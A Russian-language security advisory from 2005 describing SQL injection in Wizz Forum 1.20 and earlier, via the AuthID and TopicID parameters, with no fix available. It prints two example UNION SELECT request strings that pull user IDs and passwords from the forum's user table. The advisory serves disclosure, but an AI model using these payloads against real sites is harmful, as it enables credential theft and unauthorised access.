SQL-инъекция в Wizz Forum

Дата публикации:
16.11.2005
Дата изменения:
17.11.2005
Всего просмотров:
1342
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Wizz Forum 1.x
Уязвимые версии: Wizz Forum 1.20 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "AuthID" сценария ForumAuthDetails.php, и параметре "TopicID" сценария ForumTopicDetails.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Для успешной эксплуатации уязвимости в сценарии ForumAuthDetails.php требуется, чтобы опция magic_quotes_gpc была выключена. Пример:

ForumAuthDetails.php?AuthID=-4654'%20union%20
select%20password,userid,password,userid,5,6,7,
"http://www.sqor.net",lastlogin,lastlogin,lastlogin,5465
465464,8979878745%20from%20ForumUser%20where%20user_index=1

ForumTopicDetails.php?TopicID=-10%20union%20
select%201,userid,password,userid,joindate,4444444,
4444444%20from%20ForumUser%20where%20user_index=1

URL производителя: www.wizzcomputers.com/ForumD.php

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: Wizz Forum Multiple SQL Injection Vulnerabilities
Multible Sql injections in Wizz Forum

или введите имя

CAPTCHA